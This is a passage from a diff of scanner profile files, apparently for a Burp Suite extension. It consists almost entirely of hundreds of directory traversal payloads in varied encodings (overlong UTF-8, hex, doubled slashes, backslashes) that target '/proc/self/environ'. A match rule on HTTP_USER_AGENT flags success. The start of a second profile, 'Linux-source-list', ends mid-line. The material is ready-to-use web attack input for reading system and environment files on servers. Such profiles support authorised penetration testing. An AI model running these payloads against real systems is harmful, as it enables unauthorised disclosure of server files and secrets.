"true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,..0x5c{FILE}", + "true,..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,///%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,\\\\\\%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..//{FILE}", + "true,..//..//{FILE}", + "true,..//..//..//{FILE}", + "true,..//..//..//..//{FILE}", + "true,..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//..//{FILE}", + "true,..///{FILE}", + "true,..///..///{FILE}", + "true,..///..///..///{FILE}", + "true,..///..///..///..///{FILE}", + "true,..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///..///{FILE}", + "true,..\\\\{FILE}", + "true,..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,./\\/./{FILE}", + "true,./\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,./../{FILE}", + "true,./.././../{FILE}", + "true,./.././.././../{FILE}", + "true,./.././.././.././../{FILE}", + "true,./.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././.././../{FILE}", + "true,.\\..\\{FILE}", + "true,.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.//..//{FILE}", + "true,.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,../{FILE}", + "true,../..//{FILE}", + "true,../..//../{FILE}", + "true,../..//../..//{FILE}", + "true,../..//../..//../{FILE}", + "true,../..//../..//../..//{FILE}", + "true,../..//../..//../..//../{FILE}", + "true,../..//../..//../..//../..//{FILE}", + "true,..\\{FILE}", + "true,..\\..\\\\{FILE}", + "true,..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..///{FILE}", + "true,../..///{FILE}", + "true,../..//..///{FILE}", + "true,../..//../..///{FILE}", + "true,../..//../..//..///{FILE}", + "true,../..//../..//../..///{FILE}", + "true,../..//../..//../..//..///{FILE}", + "true,../..//../..//../..//../..///{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,HTTP_USER_AGENT" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Linux-self-environ", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "Linux-self-environ", + "RemediationDetail": "", + "IssueBackground": "Linux-self-environ", + "RemediationBackground": "", + "Header": [ + { + "type": "Payload", + "match": "{FILE}", + "replace": "proc/self/environ", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Linux-source-list.bb b/profiles/Linux-source-list.bb index 112af7f..891dda6 100755 --- a/profiles/Linux-source-list.bb +++ b/profiles/Linux-source-list.bb @@ -1 +1,950 @@ -[{"Name":"Linux-source-list","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2